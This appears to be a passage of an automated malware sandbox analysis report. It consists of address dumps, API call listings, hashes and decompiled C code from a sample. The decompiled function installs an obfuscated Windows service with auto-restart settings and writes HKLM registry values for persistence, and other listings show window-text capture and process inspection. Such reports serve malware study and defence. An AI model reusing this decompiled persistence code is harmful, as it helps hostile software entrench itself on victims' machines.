                                                                                                        0x70987b13
                                                                                                        0x00000000
                                                                                                        0x70987a88
                                                                                                        0x70987a99
                                                                                                        0x70987aa2
                                                                                                        0x70987aa4
                                                                                                        0x70987aa9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987ab2
                                                                                                        0x70987ab7
                                                                                                        0x70987aba
                                                                                                        0x70987ac0
                                                                                                        0x70987ad2
                                                                                                        0x70987adb
                                                                                                        0x70987ae0
                                                                                                        0x70987aef
                                                                                                        0x70987aef
                                                                                                        0x70987afe
                                                                                                        0x70987b08
                                                                                                        0x70987b16
                                                                                                        0x70987b1a
                                                                                                        0x70987b3a
                                                                                                        0x70987b4a
                                                                                                        0x70987b4d
                                                                                                        0x70987b52
                                                                                                        0x70987b63
                                                                                                        0x70987b6d
                                                                                                        0x70987b78
                                                                                                        0x70987b7e
                                                                                                        0x70987b7e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987b08
                                                                                                        0x70987a82
                                                                                                        0x709879eb
                                                                                                        0x709877d8
                                                                                                        0x709877d8
                                                                                                        0x709877de
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709877eb
                                                                                                        0x709877ef
                                                                                                        0x00000000
                                                                                                        0x709877f1
                                                                                                        0x709877f3
                                                                                                        0x709877fa
                                                                                                        0x709877fa
                                                                                                        0x70987804
                                                                                                        0x70987811
                                                                                                        0x7098781a
                                                                                                        0x7098781c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987835
                                                                                                        0x70987839
                                                                                                        0x70987862
                                                                                                        0x70987862
                                                                                                        0x70987864
                                                                                                        0x70987868
                                                                                                        0x70987868
                                                                                                        0x7098786c
                                                                                                        0x00000000
                                                                                                        0x7098786c
                                                                                                        0x70987840
                                                                                                        0x7098785a
                                                                                                        0x7098785c
                                                                                                        0x7098785c
                                                                                                        0x7098785d
                                                                                                        0x7098785e
                                                                                                        0x00000000
                                                                                                        0x70987823
                                                                                                        0x70987823
                                                                                                        0x70987825
                                                                                                        0x70987826
                                                                                                        0x7098782a
                                                                                                        0x70987831
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987833
                                                                                                        0x709877d2
                                                                                                        0x70987545
                                                                                                        0x00000000
                                                                                                        0x70987cda
                                                                                                        0x70987cdc
                                                                                                        0x00000000
                                                                                                        0x70987cdc
                                                                                                        0x709874f2

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 70987257
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004,?,00000014), ref: 7098726B
                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 70987285
                                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000009,?,00000014), ref: 7098729B
                                                                                                        • CharLowerW.USER32(?), ref: 709872A9
                                                                                                        • RtlZeroMemory.NTDLL(7098F3D0,0000011C), ref: 709872B9
                                                                                                        • RtlGetNtVersionNumbers.NTDLL(?,?,?), ref: 709872E3
                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000034), ref: 7098737A
                                                                                                        • RtlMoveMemory.NTDLL(00000034,00000000,?), ref: 70987419
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000034,00000000,?), ref: 70987420
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70987427
                                                                                                        • RtlMoveMemory.NTDLL(00000035,00000000,?), ref: 7098745C
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000035,00000000,?), ref: 70987463
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098746A
                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,?), ref: 709874A3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 709874AA
                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?), ref: 709874B1
                                                                                                          • Part of subcall function 70981E40: lstrlenA.KERNEL32(00000100,00000100,00000000,?,?,?,?,?,70989143), ref: 70981ECE
                                                                                                          • Part of subcall function 70981E40: RtlComputeCrc32.NTDLL ref: 70981ED8
                                                                                                        • SetTimer.USER32(00000000,00000000,00000000,00000000), ref: 709874C7
                                                                                                        • GetMessageW.USER32 ref: 709874EA
                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 70987569
                                                                                                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 709875A5
                                                                                                        • StrChrW.SHLWAPI(7098CA4C,00000025,00A599F8,00A521E0,00000000,00001000,?,?,?,00000000,00000000,00000000), ref: 709875C2
                                                                                                        • wsprintfW.USER32 ref: 709875CD
                                                                                                        • StrChrW.SHLWAPI(7098CDDC,00000050,?,00000000,?,00000103,00A65BE8,?,?,?,?,?,?,?,?,00000000), ref: 709875FA
                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 709875FD
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 7098762B
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 70987632
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 70987639
                                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 70987652
                                                                                                        • GetWindowTextW.USER32 ref: 70987676
                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,?), ref: 709876AA
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 709876B1
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 709876B8
                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 709876EA
                                                                                                        • NtOpenProcess.NTDLL ref: 70987750
                                                                                                        • GetModuleFileNameExW.PSAPI(?,00000000,?,00000104), ref: 7098776C
                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,?), ref: 7098779C
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000410,?,?), ref: 709877A3
                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,00000410,?,?), ref: 709877AA
                                                                                                        • NtClose.NTDLL(?), ref: 709877B5
                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 709877FA
                                                                                                        • GetDlgItemTextA.USER32 ref: 70987811
                                                                                                        • StrChrA.SHLWAPI(7098CDD8,00000020,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 70987847
                                                                                                        • StrTrimA.SHLWAPI(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 70987852
                                                                                                        • GetDlgItemTextA.USER32 ref: 70987896
                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 709879DF
                                                                                                        • WritePrivateProfileStringW.KERNEL32 ref: 70987A54
                                                                                                        • GetProcessHeap.KERNEL32 ref: 70987AE8
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70987AEF
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000000,00A65BE8), ref: 70987AF7
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00A65BE8), ref: 70987AFE
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000001C,007837D8,?,00000000,00A65BE8), ref: 70987B33
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70987B3A
                                                                                                        • CreateThread.KERNEL32 ref: 70987B66
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70987B6D
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 70987B78
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 70987B89
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70987B90
                                                                                                        • RtlZeroMemory.NTDLL(?,00000008), ref: 70987BAA
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,00000008), ref: 70987BB7
                                                                                                        • RtlTimeToSecondsSince1970.NTDLL ref: 70987BE1
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 70987C09
                                                                                                        • StrChrW.SHLWAPI(7098CDA0,00000025,?), ref: 70987C35
                                                                                                        • wsprintfW.USER32 ref: 70987C44
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00A65BE8), ref: 70987C66
                                                                                                        • SetEvent.KERNEL32(?), ref: 70987C8D
                                                                                                        • SetTimer.USER32(00000000,00000000,0000003C,00000000), ref: 70987CA3
                                                                                                        • DispatchMessageW.USER32 ref: 70987CB9
                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 70987CCA
                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 70987CDC
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 70987CE9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$MemoryProcess$Free$MoveZero$PrivateProfileTimer$MessageStringTextTimeVirtualWindow$AllocCloseFileItemKillSleepThreadWritewsprintf$CharComputeCrc32CreateDispatchEventForegroundHandleInfoLocaleLowerModuleNameNumbersOpenSecondsSince1970SystemTrimVersionlstrlen
                                                                                                        • String ID: ($g$g
                                                                                                        • API String ID: 3902037593-2003133257
                                                                                                        • Opcode ID: 0d0e4da37cb1bce770013482c06b4907a50d66610f42646c300ba7671c4b3f90
                                                                                                        • Instruction ID: 83c701da498bc4b73fc86bb78e5b2d38ed70344f94504811a330f3819e5b7a14
                                                                                                        • Opcode Fuzzy Hash: 0d0e4da37cb1bce770013482c06b4907a50d66610f42646c300ba7671c4b3f90
                                                                                                        • Instruction Fuzzy Hash: 6C626CB2518341AFD320DF65C884B6BB7E9BB88704F10892DF69687391E774E944CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983DC0, Relevance: 119.0, APIs: 79, Instructions: 521registrystringserviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 71%
                                                                                                        			E70983DC0() {
				short _v1568;
				short _v1576;
				char _v1604;
				short _v2096;
				char _v2104;
				short _v2108;
				short _v2112;
				short _v2116;
				short _v2120;
				short _v2124;
				short _v2128;
				short _v2132;
				short _v2136;
				void* _v2140;
				intOrPtr _v2144;
				void* _v2148;
				void* _v2152;
				int _v2156;
				short* _v2164;
				int _v2168;
				int _v2176;
				int _v2180;
				char _v2184;
				void* _v2188;
				char _v2192;
				void* _v2196;
				void* _v2200;
				void* _v2204;
				void* _v2208;
				void* _v2212;
				char _v2216;
				void* _v2220;
				void* _v2224;
				void* _v2228;
				short* _t86;
				void** _t96;
				WCHAR* _t102;
				long _t106;
				intOrPtr _t107;
				intOrPtr _t113;
				int _t117;
				short* _t118;
				intOrPtr _t124;
				intOrPtr _t131;
				int _t152;
				char* _t154;
				int _t168;
				char* _t170;
				int _t186;
				char* _t188;
				void* _t192;
				void* _t195;
				WCHAR* _t201;
				char* _t211;
				char* _t223;
				intOrPtr _t233;
				void* _t240;
				short** _t247;
				short** _t250;
				short** _t251;
				short** _t252;
				short** _t253;
				short** _t254;

				_t247 =  &_v2164;
				_v2152 = 0;
				_t86 = OpenSCManagerW(0, 0, 0xf003f); // executed
				_t240 = _t86;
				_v2148 = _t240;
				if(_t240 != 0) {
					L3:
					_v2164 = 0;
					_t195 = OpenServiceW(_t240, StrChrW(0x7098c90c, 0x55), 0xf01ff);
					if(_t195 != 0) {
						L15:
						_v2156 = 1;
						_push(StrChrW(0x7098c798, 0x5c));
						_push(StrChrW(0x7098c90c, 0x55));
						_push(StrChrW(0x7098c780, 0x5c));
						wsprintfW( &_v2104, StrChrW(0x7098c740, 0x53));
						if(RegCreateKeyExW(0x80000002,  &_v2096, 0, 0, 0, 0xf023f, 0,  &_v2176, 0) == 0) {
							_push(0x20a);
							_push( &_v2096);
							L7098BF02();
							_v2180 = 0x20a;
							_v2176 = 2;
							_t106 = RegQueryValueExW(_v2188, StrChrW(0x7098c728, 0x53), 0,  &_v2176,  &_v2104,  &_v2180); // executed
							if(_t106 != 0) {
								L18:
								_t107 =  *0x7098f5dc; // 0x33
								_t223 =  *0x7098f5d4; // 0xa610b8
								_t74 = _t107 + 2; // 0x35
								RegSetValueExW(_v2192, StrChrW(0x7098c728, 0x53), 0, 2, _t223, _t107 + _t74);
							} else {
								_t201 =  *0x7098f5d4; // 0xa610b8
								if(lstrcmpiW( &_v2108, _t201) != 0) {
									goto L18;
								}
							}
							RegCloseKey(_v2192);
						}
						L7098BF02();
						_t96 =  &_v2164;
						_v2164 = 0;
						__imp__QueryServiceStatusEx(_t195, 0,  &_v2140, 0x24, _t96,  &_v2132, 0x24);
						if(_t96 == 0 || _v2156 != 4) {
							if( *0x7098f5f4 == 0) {
								_push(0);
								_push(0);
							} else {
								_t102 = StrChrW(0x7098c6ac, 0x73);
								_push(1);
								_v2204 = _t102;
								_push( &_v2204);
							}
							_push(_t195);
							E70983920();
						}
						CloseServiceHandle(_t195);
					} else {
						if( *0x7098f5f4 != 0) {
							_t113 =  *0x7098f5ec; // 0xa42c0a
							_push(_t113);
							_push(StrChrW(0x7098c8e4, 0x55));
							_push(StrChrW(0x7098c8d0, 0x73));
							_t117 = wsprintfW( &_v1576, StrChrW(0x7098c868, 0x25));
							_t250 =  &(_t247[5]);
							_v2168 = _t117;
							_t118 = StrChrW(0x7098c83c, 0x55);
							_t195 = CreateServiceW(_v2164, StrChrW(0x7098c90c, 0x55), _t118, 0xf01ff, 0x20, 2, 0,  &_v1568, 0, 0, 0, 0, 0);
							if(_t195 != 0) {
								_v2156 = 0;
								_v2148 = 0;
								_v2152 = 0;
								_v2136 = 1;
								_v2128 = 1;
								_v2120 = 1;
								_v2132 = 0x1388;
								_v2124 = 0x1388;
								_v2116 = 0x1388;
								_v2144 = 3;
								_v2140 =  &_v2136;
								__imp__ChangeServiceConfig2W(_t195, 2,  &_v2156);
								_push(0x7098c560);
								_push(0);
								_push(StrChrW(0x7098c8d0, 0x73));
								_t124 =  *0x7098f52c; // 0x748878
								_push(_t124);
								wsprintfW( &_v2120, StrChrW(0x7098c824, 0x25));
								_t251 =  &(_t250[6]);
								if(RegCreateKeyExW(0x80000002,  &_v2112, 0, 0, 0, 0xf023f, 0,  &_v2192, 0) == 0) {
									_t186 = lstrlenW(StrChrW(0x7098c90c, 0x55));
									_t188 = StrChrW(0x7098c90c, 0x55);
									RegSetValueExW(_v2204, StrChrW(0x7098c8e4, 0x55), 0, 7, _t188, _t186 + _t186); // executed
									RegCloseKey(_v2204);
								}
								_push(StrChrW(0x7098c8e4, 0x55));
								_push(0x5c);
								_push(StrChrW(0x7098c8d0, 0x73));
								_t131 =  *0x7098f52c; // 0x748878
								_push(_t131);
								wsprintfW( &_v2124, StrChrW(0x7098c824, 0x25));
								_t252 =  &(_t251[6]);
								if(RegCreateKeyExW(0x80000002,  &_v2116, 0, 0, 0, 0xf023f, 0,  &_v2196, 0) == 0) {
									E70982200(_v2196, 4);
									_t252 =  &(_t252[2]);
									_v2184 = 0x2000;
									RegSetValueExW(_v2200, StrChrW(0x7098c7ec, 0x41), 0, 4,  &_v2184, 4); // executed
									_v2192 = 1;
									RegSetValueExW(_v2204, StrChrW(0x7098c7b4, 0x43), 0, 4,  &_v2192, 4); // executed
									RegCloseKey(_v2204); // executed
								}
								_push(StrChrW(0x7098c798, 0x5c));
								_push(StrChrW(0x7098c90c, 0x55));
								_push(StrChrW(0x7098c780, 0x5c));
								wsprintfW( &_v2132, StrChrW(0x7098c740, 0x53));
								_t253 =  &(_t252[5]);
								if(RegCreateKeyExW(0x80000002,  &_v2124, 0, 0, 0, 0xf023f, 0,  &_v2204, 0) == 0) {
									E70982200(_v2204, 4);
									_t233 =  *0x7098f5dc; // 0x33
									_t211 =  *0x7098f5d4; // 0xa610b8
									_t253 =  &(_t253[2]);
									_t43 = _t233 + 2; // 0x35
									RegSetValueExW(_v2208, StrChrW(0x7098c728, 0x53), 0, 2, _t211, _t233 + _t43); // executed
									RegSetValueExW(_v2212, StrChrW(0x7098c710, 0x49), 0, 2,  &_v1604, _v2204 + _v2204 + 2); // executed
									_t168 = lstrlenW(StrChrW(0x7098c700, 0x53));
									_t170 = StrChrW(0x7098c700, 0x53);
									RegSetValueExW(_v2224, StrChrW(0x7098c6e4, 0x53), 0, 1, _t170, _t168 + _t168); // executed
									_v2216 = 0;
									RegSetValueExW(_v2228, StrChrW(0x7098c6b4, 0x53), 0, 4,  &_v2216, 4); // executed
									RegCloseKey(_v2228);
								}
								_push(0x7098c560);
								_push(StrChrW(0x7098c90c, 0x55));
								_push(StrChrW(0x7098c780, 0x5c));
								wsprintfW( &_v2136, StrChrW(0x7098c740, 0x53));
								_t254 =  &(_t253[5]);
								if(RegCreateKeyExW(0x80000002,  &_v2128, 0, 0, 0, 0xf023f, 0,  &_v2208, 0) == 0) {
									E70982200(_v2208, 4);
									_t254 =  &(_t254[2]);
									_t152 = lstrlenW(StrChrW(0x7098c700, 0x53));
									_t154 = StrChrW(0x7098c700, 0x53);
									RegSetValueExW(_v2220, StrChrW(0x7098c6e4, 0x53), 0, 1, _t154, _t152 + _t152); // executed
									RegCloseKey(_v2220);
								}
								E70982200(_t195, 2);
								_t247 =  &(_t254[2]);
								goto L15;
							}
						}
					}
					CloseServiceHandle(_v2188);
					return _v2192;
				} else {
					_t192 = OpenSCManagerW(_t86, _t86, 1);
					_v2148 = _t192;
					if(_t192 == 0) {
						return 0;
					} else {
						_t240 = _t192;
						goto L3;
					}
				}
			}


































































                                                                                                        0x70983dc0
                                                                                                        0x70983dd8
                                                                                                        0x70983ddc
                                                                                                        0x70983dde
                                                                                                        0x70983de0
                                                                                                        0x70983de6
                                                                                                        0x70983dfc
                                                                                                        0x70983e0f
                                                                                                        0x70983e29
                                                                                                        0x70983e2d
                                                                                                        0x7098421a
                                                                                                        0x70984221
                                                                                                        0x7098422b
                                                                                                        0x70984235
                                                                                                        0x7098423f
                                                                                                        0x7098424f
                                                                                                        0x7098427a
                                                                                                        0x70984280
                                                                                                        0x70984289
                                                                                                        0x7098428a
                                                                                                        0x709842a7
                                                                                                        0x709842af
                                                                                                        0x709842bf
                                                                                                        0x709842c7
                                                                                                        0x709842df
                                                                                                        0x709842df
                                                                                                        0x709842e4
                                                                                                        0x709842ea
                                                                                                        0x70984303
                                                                                                        0x709842c9
                                                                                                        0x709842c9
                                                                                                        0x709842dd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709842dd
                                                                                                        0x7098430a
                                                                                                        0x7098430a
                                                                                                        0x70984317
                                                                                                        0x7098431c
                                                                                                        0x7098432b
                                                                                                        0x70984333
                                                                                                        0x7098433b
                                                                                                        0x7098434b
                                                                                                        0x70984363
                                                                                                        0x70984365
                                                                                                        0x7098434d
                                                                                                        0x70984354
                                                                                                        0x70984356
                                                                                                        0x7098435c
                                                                                                        0x70984360
                                                                                                        0x70984360
                                                                                                        0x70984367
                                                                                                        0x70984368
                                                                                                        0x7098436d
                                                                                                        0x70984371
                                                                                                        0x70983e33
                                                                                                        0x70983e3a
                                                                                                        0x70983e40
                                                                                                        0x70983e45
                                                                                                        0x70983e4f
                                                                                                        0x70983e59
                                                                                                        0x70983e6c
                                                                                                        0x70983e6e
                                                                                                        0x70983e95
                                                                                                        0x70983e99
                                                                                                        0x70983eb1
                                                                                                        0x70983eb7
                                                                                                        0x70983ebd
                                                                                                        0x70983ec1
                                                                                                        0x70983ec5
                                                                                                        0x70983ed8
                                                                                                        0x70983edc
                                                                                                        0x70983ee0
                                                                                                        0x70983eeb
                                                                                                        0x70983eef
                                                                                                        0x70983ef3
                                                                                                        0x70983ef7
                                                                                                        0x70983eff
                                                                                                        0x70983f03
                                                                                                        0x70983f09
                                                                                                        0x70983f0e
                                                                                                        0x70983f19
                                                                                                        0x70983f1a
                                                                                                        0x70983f1f
                                                                                                        0x70983f2f
                                                                                                        0x70983f31
                                                                                                        0x70983f5a
                                                                                                        0x70983f66
                                                                                                        0x70983f76
                                                                                                        0x70983f8c
                                                                                                        0x70983f93
                                                                                                        0x70983f93
                                                                                                        0x70983fa2
                                                                                                        0x70983fa3
                                                                                                        0x70983fae
                                                                                                        0x70983faf
                                                                                                        0x70983fb4
                                                                                                        0x70983fc4
                                                                                                        0x70983fc6
                                                                                                        0x70983fef
                                                                                                        0x70983ff8
                                                                                                        0x70983ffd
                                                                                                        0x70984012
                                                                                                        0x70984022
                                                                                                        0x70984036
                                                                                                        0x70984046
                                                                                                        0x7098404d
                                                                                                        0x7098404d
                                                                                                        0x7098405c
                                                                                                        0x70984066
                                                                                                        0x70984070
                                                                                                        0x70984080
                                                                                                        0x70984082
                                                                                                        0x709840ab
                                                                                                        0x709840b8
                                                                                                        0x709840bd
                                                                                                        0x709840c3
                                                                                                        0x709840c9
                                                                                                        0x709840cc
                                                                                                        0x709840e5
                                                                                                        0x7098410b
                                                                                                        0x70984117
                                                                                                        0x70984127
                                                                                                        0x7098413d
                                                                                                        0x70984151
                                                                                                        0x70984161
                                                                                                        0x70984168
                                                                                                        0x70984168
                                                                                                        0x7098416e
                                                                                                        0x7098417c
                                                                                                        0x70984186
                                                                                                        0x70984196
                                                                                                        0x70984198
                                                                                                        0x709841c1
                                                                                                        0x709841ca
                                                                                                        0x709841cf
                                                                                                        0x709841dc
                                                                                                        0x709841ec
                                                                                                        0x70984202
                                                                                                        0x70984209
                                                                                                        0x70984209
                                                                                                        0x70984212
                                                                                                        0x70984217
                                                                                                        0x00000000
                                                                                                        0x70984217
                                                                                                        0x70983eb7
                                                                                                        0x70983e3a
                                                                                                        0x7098437c
                                                                                                        0x70984390
                                                                                                        0x70983de8
                                                                                                        0x70983dec
                                                                                                        0x70983dee
                                                                                                        0x70983df4
                                                                                                        0x7098439c
                                                                                                        0x70983dfa
                                                                                                        0x70983dfa
                                                                                                        0x00000000
                                                                                                        0x70983dfa
                                                                                                        0x70983df4

                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 70983DDC
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 70983DEC
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,000F01FF), ref: 70983E13
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000), ref: 70983E17
                                                                                                        • StrChrW.SHLWAPI(7098C8E4,00000055,00A42C0A), ref: 70983E4D
                                                                                                        • StrChrW.SHLWAPI(7098C8D0,00000073,00000000), ref: 70983E57
                                                                                                        • StrChrW.SHLWAPI(7098C868,00000025,00000000), ref: 70983E61
                                                                                                        • wsprintfW.USER32 ref: 70983E6C
                                                                                                        • StrChrW.SHLWAPI(7098C83C,00000055,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 70983E99
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,00000000), ref: 70983EA3
                                                                                                        • CreateServiceW.ADVAPI32(?,00000000), ref: 70983EAB
                                                                                                        • ChangeServiceConfig2W.ADVAPI32 ref: 70983F03
                                                                                                        • StrChrW.SHLWAPI(7098C8D0,00000073,00000000,7098C560), ref: 70983F17
                                                                                                        • StrChrW.SHLWAPI(7098C824,00000025,00748878,00000000), ref: 70983F27
                                                                                                        • wsprintfW.USER32 ref: 70983F2F
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000,?,?,?,00000000,00000002,?), ref: 70983F52
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,?,?,?,00000000,00000002,?), ref: 70983F63
                                                                                                        • lstrlenW.KERNEL32(00000000,?,?,?,00000000,00000002,?), ref: 70983F66
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,00000000,?,?,?,00000000,00000002,?), ref: 70983F76
                                                                                                        • StrChrW.SHLWAPI(7098C8E4,00000055,00000000,00000007,00000000,?,?,?,00000000,00000002,?), ref: 70983F84
                                                                                                        • RegSetValueExW.KERNEL32(?,00000000,?,?,?,00000000,00000002,?), ref: 70983F8C
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000000,00000002,?), ref: 70983F93
                                                                                                        • StrChrW.SHLWAPI(7098C8E4,00000055,?,?,?,00000000,00000002,?), ref: 70983FA0
                                                                                                        • StrChrW.SHLWAPI(7098C8D0,00000073,0000005C,00000000,?,?,?,00000000,00000002,?), ref: 70983FAC
                                                                                                        • StrChrW.SHLWAPI(7098C824,00000025,00748878,00000000,?,?,?,00000000,00000002,?), ref: 70983FBC
                                                                                                        • wsprintfW.USER32 ref: 70983FC4
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 70983FE7
                                                                                                        • StrChrW.SHLWAPI ref: 7098401A
                                                                                                        • RegSetValueExW.KERNEL32(?,00000000), ref: 70984022
                                                                                                        • StrChrW.SHLWAPI(7098C7B4,00000043,00000000,00000004,?,00000004), ref: 7098403E
                                                                                                        • RegSetValueExW.KERNEL32(?,00000000), ref: 70984046
                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 7098404D
                                                                                                        • StrChrW.SHLWAPI(7098C798,0000005C), ref: 7098405A
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,00000000), ref: 70984064
                                                                                                        • StrChrW.SHLWAPI(7098C780,0000005C,00000000), ref: 7098406E
                                                                                                        • StrChrW.SHLWAPI(7098C740,00000053,00000000), ref: 70984078
                                                                                                        • wsprintfW.USER32 ref: 70984080
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 709840A3
                                                                                                        • StrChrW.SHLWAPI(7098C728,00000053,00000000,00000002,00A610B8,00000035), ref: 709840DD
                                                                                                        • RegSetValueExW.KERNEL32(?,00000000), ref: 709840E5
                                                                                                        • StrChrW.SHLWAPI(7098C710,00000049,00000000,00000002,?,?), ref: 70984103
                                                                                                        • RegSetValueExW.KERNEL32(?,00000000), ref: 7098410B
                                                                                                        • StrChrW.SHLWAPI(7098C700,00000053), ref: 70984114
                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 70984117
                                                                                                        • StrChrW.SHLWAPI(7098C700,00000053,00000000), ref: 70984127
                                                                                                        • StrChrW.SHLWAPI(7098C6E4,00000053,00000000,00000001,00000000), ref: 70984135
                                                                                                        • RegSetValueExW.KERNEL32(?,00000000), ref: 7098413D
                                                                                                        • StrChrW.SHLWAPI ref: 70984159
                                                                                                        • RegSetValueExW.KERNEL32(?,00000000), ref: 70984161
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 70984168
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,7098C560), ref: 7098417A
                                                                                                        • StrChrW.SHLWAPI(7098C780,0000005C,00000000), ref: 70984184
                                                                                                        • StrChrW.SHLWAPI(7098C740,00000053,00000000), ref: 7098418E
                                                                                                        • wsprintfW.USER32 ref: 70984196
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 709841B9
                                                                                                        • StrChrW.SHLWAPI(7098C700,00000053), ref: 709841D9
                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 709841DC
                                                                                                        • StrChrW.SHLWAPI(7098C700,00000053,00000000), ref: 709841EC
                                                                                                        • StrChrW.SHLWAPI(7098C6E4,00000053,00000000,00000001,00000000), ref: 709841FA
                                                                                                        • RegSetValueExW.KERNEL32(?,00000000), ref: 70984202
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 70984209
                                                                                                        • StrChrW.SHLWAPI ref: 70984229
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,00000000), ref: 70984233
                                                                                                        • StrChrW.SHLWAPI(7098C780,0000005C,00000000), ref: 7098423D
                                                                                                        • StrChrW.SHLWAPI(7098C740,00000053,00000000), ref: 70984247
                                                                                                        • wsprintfW.USER32 ref: 7098424F
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 70984272
                                                                                                        • RtlZeroMemory.NTDLL(?,0000020A), ref: 7098428A
                                                                                                        • StrChrW.SHLWAPI ref: 709842B7
                                                                                                        • RegQueryValueExW.KERNEL32(?,00000000), ref: 709842BF
                                                                                                        • lstrcmpiW.KERNEL32(?,00A610B8), ref: 709842D5
                                                                                                        • StrChrW.SHLWAPI(7098C728,00000053,00000000,00000002,00A610B8,00000035), ref: 709842FB
                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000), ref: 70984303
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 7098430A
                                                                                                        • RtlZeroMemory.NTDLL(?,00000024), ref: 70984317
                                                                                                        • QueryServiceStatusEx.ADVAPI32 ref: 70984333
                                                                                                        • StrChrW.SHLWAPI(7098C6AC,00000073), ref: 70984354
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00000024), ref: 70984371
                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 7098437C
                                                                                                        Memory Dump Source
